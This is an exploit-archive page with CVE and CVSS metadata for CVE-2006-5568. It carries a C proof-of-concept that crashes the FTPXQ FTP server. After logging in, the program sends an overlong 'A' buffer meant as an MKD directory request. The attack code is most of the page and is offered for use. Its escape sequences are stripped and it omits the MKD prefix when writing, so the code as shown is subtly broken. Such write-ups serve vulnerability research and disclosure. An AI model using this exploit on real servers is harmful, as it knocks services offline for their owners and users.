FTPXQ Denial of service exploit

2006.10.31
Credit: Federico Fazzi
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-5568
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

/* * 0xf_ftpxq.c - FTPXQ Denial of service exploit. * Federico Fazzi <federico at autistici.org> * * advisory by Eric Sesterhenn. * -- Server built using the WinsockQ from DataWizard Technologies. A security * -- vulnerability in the product allows remote attackers to overflow an * -- internal buffer by providing an overly long "make directory" request. * * r20061025. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> // AAAAAAAAAAAAAAAA..AA*255 in hex format. char bof[] = "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41x41x41x41x41x41" "x41x41x41x41x41x41x41x41"; int main(int argc, char **argv) { int sd; socklen_t len; struct sockaddr_in saddr; struct hostent *he; char buf[512], tmpbuf[128]; if(argc != 5) { printf("FTPXQ Server - Denial of service exploit.n" "Federico Fazzi <federico at autistici.org>nn" "usage: %s <hostname> <port> <user> <password>n", argv[0]); exit(1); } if((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); } // init socket if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("socket()"); exit(1); } // setup struct bzero((char *) &saddr, sizeof(saddr)); saddr.sin_family = AF_INET; bcopy((char *)he->h_addr, (char *)&saddr.sin_addr.s_addr, he->h_length); saddr.sin_port = htons(atoi(argv[2])); len = sizeof(struct sockaddr); // init connection if(connect(sd, (struct sockaddr *)&saddr, len) == -1) { perror("connect()"); exit(1); } printf("FTPXQ Server - Denial of service exploit.n" "Federico Fazzi <federico at autistici.org>n" "---------------------------------------n"); puts("connecting..tt done"); // sending a USER data to daemon sprintf(buf, "USER %srn", argv[3]); write(sd, buf, strlen(buf)); puts("sending USER data..t done"); // sending a PASS data to daemon sprintf(buf, "PASS %srn", argv[4]); write(sd, buf, strlen(buf)); puts("sending PASS data..t done"); // sending a BOF string with MKD command to host sprintf(buf, "MKD %s", bof); write(sd, bof, strlen(bof)); puts("sending MKD bof string.. done"); // now checking if server i down if(read(sd, tmpbuf, sizeof(tmpbuf)) > 0) puts("[!] server doesn't vulnerable"); else puts("[+] server getting down.. done"); close(sd); return(0); }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top